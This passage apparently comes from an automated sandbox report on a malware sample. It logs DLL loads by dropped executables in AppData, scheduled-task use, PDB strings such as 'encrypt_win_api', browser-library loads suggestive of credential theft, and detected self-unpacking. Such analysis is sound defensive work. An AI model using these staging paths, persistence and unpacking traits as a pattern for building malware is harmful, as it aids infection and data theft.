Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\rujtcgu	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\rujtcgu	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\explorer.exe	Section loaded: version.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe	Section loaded: iconcodecservice.dll
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe	Section loaded: icu.dll
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe	Section loaded: container.dll
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe	Section loaded: samlib.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll
Source: C:\Windows\explorer.exe	Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: es.dll
Source: C:\Windows\explorer.exe	Section loaded: prnfldr.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: E609.exe, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: nss3.pdb@ source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\rujtcgu	Unpacked PE file: 4.2.rujtcgu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Unpacked PE file: 10.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Unpacked PE file: 15.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Unpacked PE file: 17.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Unpacked PE file: 19.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Unpacked PE file: 27.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Unpacked PE file: 28.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Unpacked PE file: 33.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\rujtcgu	Unpacked PE file: 34.2.rujtcgu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 35.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Unpacked PE file: 10.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Unpacked PE file: 15.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Unpacked PE file: 17.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Unpacked PE file: 19.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Unpacked PE file: 27.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Unpacked PE file: 28.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Unpacked PE file: 33.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 35.2.mstsca.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

10_2_00412220

Source: build3.exe.15.dr	Static PE information: section name: .kic
Source: build3[1].exe.15.dr	Static PE information: section name: .kic
Source: sqls[1].dll.19.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.19.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.19.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.19.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.19.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.19.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.19.dr	Static PE information: section name: .didat
Source: nss3.dll.19.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.19.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.19.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.19.dr	Static PE information: section name: .00cfg
Source: mstsca.exe.28.dr	Static PE information: section name: .kic

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004026D2 push ebx; ret	0_2_004026EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004026ED pushad ; ret	0_2_004026F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004026F7 push ebx; ret	0_2_00402714
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402745 push edi; ret	0_2_0040276D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040273B push edi; ret	0_2_00402742
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402595 push ss; ret	0_2_0040259C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004027BB push edi; ret	0_2_0040276D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E22822 push edi; ret	0_2_02E227D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E225FC push ss; ret	0_2_02E22603
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E227A2 push edi; ret	0_2_02E227A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E215A4 push AFD66869h; ret	0_2_02E215A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E227AC push edi; ret	0_2_02E227D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E22754 pushad ; ret	0_2_02E2275B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E2275E push ebx; ret	0_2_02E2277B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E22739 push ebx; ret	0_2_02E22751
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E546ED push D23524A7h; retn 0006h	0_2_02E546F5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E59E74 push 4843A5D1h; retf	0_2_02E59E80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E5462B pushad ; iretd	0_2_02E5462C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E59E3E push ecx; retf	0_2_02E59E40
